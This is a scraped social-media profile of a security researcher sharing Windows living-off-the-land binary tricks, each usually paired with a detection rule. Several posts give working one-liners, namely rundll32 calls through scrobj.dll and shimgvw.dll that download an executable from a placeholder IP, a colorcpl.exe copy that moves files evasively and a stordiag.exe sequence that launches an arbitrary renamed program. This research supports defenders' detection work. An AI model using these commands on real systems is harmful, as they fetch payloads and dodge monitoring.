eral4m

13 posts

eral4m

@eral4m

Infosec research.

Katılım Ekim 2021

75 Takip Edilen27 Takipçiler

eral4m@eral4m·2 Haz

@_JohnHammond Requires admin level access by default though i believe...

English

eral4m@eral4m·2 Haz

@_JohnHammond Interesting detail - in the situation where SMB is blocked, the act of searching the search-ms: link causes the files that are found in the search to be downloaded to WebDAV cache: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{UUID}.exe

English

John Hammond@_JohnHammond·2 Haz

Since ms-msdt: is now readily detected and the conversation has changed to search-ms: and some more staggered social engineering tricks, here is a useless thread on a silly thing tricksters might be able to pull off with some of the new fun things we have learned: 🧵

English

313

eral4m@eral4m·31 May

@GossiTheDog @cyb3rops Yea, and even if you have SMB disabled at firewall, it may default over to using WebDAV if destination server is running it as per: docs.microsoft.com/en-us/iis/publ…

English

Florian Roth ⚡️@cyb3rops·31 May

I really hope that someone already looked at these other findings in that bachelor thesis from August 2020

Gabor Szappanos@GaborSzappanos

Weird how information can't find its' proper way because we don't know or care. The zero-day RCE in Office, that makes waves today, was just a sidenote in this research paper from two years ago (page 29) benjamin-altpeter.de/doc/thesis-ele…

English

188

eral4m retweetledi

bohops@bohops·11 Mar

LOLBAS

HACKTORIA || OSINT CTF 🏴@hacktoria

Some awesome Red Team tools: - Nmap - Wireshark - Burp Suite - SE Toolkit - Metasploit - GoPhish - Exploit-DB - File Info - Haveibeenpwned - MAC Vendors - Unshorten It - Cyber Chef - Cisco Talos - MX Toolbox - Greynoise Do you have a favorite?

English

eral4m@eral4m·10 Oca

Basic Detection: File create/file write from colorcpl.exe

Română

eral4m@eral4m·10 Oca

#lolbin / #lolbas for file copy: colorcpl.exe c:\windows\system32\calc.exe Copies file to c:\windows\system32\spool\drivers\color\calc.exe Can evasively move files out of commonly abused staging areas via a process not normally monitored. Det logic below

English

eral4m@eral4m·6 Oca

Detection idea: rundll32.exe*GenerateTypeLib*://*

Deutsch

eral4m@eral4m·6 Oca

Downloader #lolbin #lolbas Possible new take on an old hit (can't find this referenced anywhere): rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://w.x.y.z/any.exe Downloads to: AppData\Local\Microsoft\Windows\INetCache\IE\<random>\any[1].exe

English

eral4m@eral4m·6 Oca

Basic detections ideas: rundll32.exe*ImageView_Fullscreen*://*

English

eral4m@eral4m·6 Oca

Downloader #lolbas #lolbin rundll32.exe "c:\windows\system32\shimgvw.dll",ImageView_Fullscreen http://<ip>/any.exe OR ImageView_FullscreenA will download your exe to: AppData\Local\Microsoft\Windows\INetCache\IE\<random>\any[1].exe

English

eral4m@eral4m·22 Eki

#lolbas

eral4m@eral4m

1) Copy c:\windows\system32\stordiag.exe to a folder 2) Name arbitrary executable either: Systeminfo.exe or schtasks.exe or fltmc.exe and place in the same folder. 3) Execute stordiag.exe 4) ??? 5) Execute order 66! #lolbin

QHT

eral4m@eral4m·21 Eki

Detection for this on endpoint (EDR/Sysmon etc): Process execution of systeminfo.exe or schtasks.exe or fltmc.exe executing from a path that isn't c:\windows\system32\ or c:\windows\syswow64 with parent of stordiag.exe

English

eral4m@eral4m·21 Eki

English

Keşfet

@_JohnHammond @GossiTheDog @cyb3rops @elonmusk @BarackObama @taylorswift13 @cristiano @BillGates